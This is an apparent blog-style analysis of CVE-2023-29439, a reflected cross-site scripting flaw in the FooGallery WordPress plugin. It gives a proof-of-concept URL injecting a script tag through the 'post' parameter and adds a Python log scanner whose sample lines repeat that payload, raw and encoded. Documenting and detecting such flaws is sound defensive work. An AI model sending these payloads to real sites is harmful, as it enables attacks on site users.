CVE-2023-29439 Analysis
Vulnerability details
Description
In Foogallery 2.2.35 and earlier, the function foogallery_image_editor_modal
in foogallery/includes/admin/class-gallery-attachment-modal.php
is vulnerable to a cross-site scripting (XSS) attack.
Pre-requisite
- Unauthenticated
Proof-of-Concept
- Foogallery Settings → Admin → Enable Advanced Attachment Modal
- Send
http://localhost:8080/wp-admin/post-new.php?post_type=foogallery&post="><script>alert(1)</script>
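As an added example (not part of the original post), a small Python scanner that reads web-server access-log lines and flags requests to the FooGallery attachment-modal endpoint whose `post` parameter carries markup instead of a numeric post ID, including the URL-encoded form. The log lines are constructed for the example, not captured traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic). Lines 3 and 4 carry the
# reflected-XSS probe shape from the advisory, raw and URL-encoded respectively.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2023:10:01:02 +0000] "GET /wp-admin/post-new.php?post_type=foogallery HTTP/1.1" 200 5120
10.0.0.5 - - [10/Apr/2023:10:01:09 +0000] "GET /wp-admin/post.php?post=42&action=edit HTTP/1.1" 200 6010
10.0.0.9 - - [10/Apr/2023:10:02:14 +0000] "GET /wp-admin/post-new.php?post_type=foogallery&post="><script>alert(1)</script> HTTP/1.1" 200 5140
10.0.0.9 - - [10/Apr/2023:10:02:31 +0000] "GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5140
"""

# Request line inside the common log format: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# A legitimate `post` value is a numeric post ID; any of these characters means markup.
MARKUP_RE = re.compile(r'[<>"\']|javascript:', re.IGNORECASE)


def suspicious_post_param(target):
    """Return the decoded `post` value when `target` is the FooGallery
    new-post endpoint and `post` contains markup characters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/wp-admin/post-new.php'):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get('post_type', [''])[0] != 'foogallery':
        return None
    for value in qs.get('post', []):
        # parse_qs already decoded once; a second unquote catches double-encoding
        decoded = unquote(value)
        if MARKUP_RE.search(decoded):
            return decoded
    return None


def scan_access_log(text):
    """Return a list of (client_ip, decoded_payload) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        payload = suspicious_post_param(m.group('target'))
        if payload is not None:
            hits.append((line.split(' ', 1)[0], payload))
    return hits


if __name__ == '__main__':
    for ip, payload in scan_access_log(SAMPLE_LOG):
        print(f'{ip}: suspicious post= value {payload!r}')
```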
References
This post is licensed under CC BY 4.0 by the author.